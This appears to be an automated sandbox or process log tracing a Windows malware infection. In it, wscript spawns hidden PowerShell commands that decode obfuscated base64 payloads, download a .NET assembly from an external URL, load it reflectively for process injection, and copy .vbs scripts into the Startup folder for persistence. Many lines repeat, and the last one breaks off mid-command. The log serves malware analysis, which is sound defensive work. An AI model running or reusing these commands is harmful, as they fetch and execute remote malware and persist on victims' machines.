Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\escrivan.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\escrivan.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\pow\wm.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, 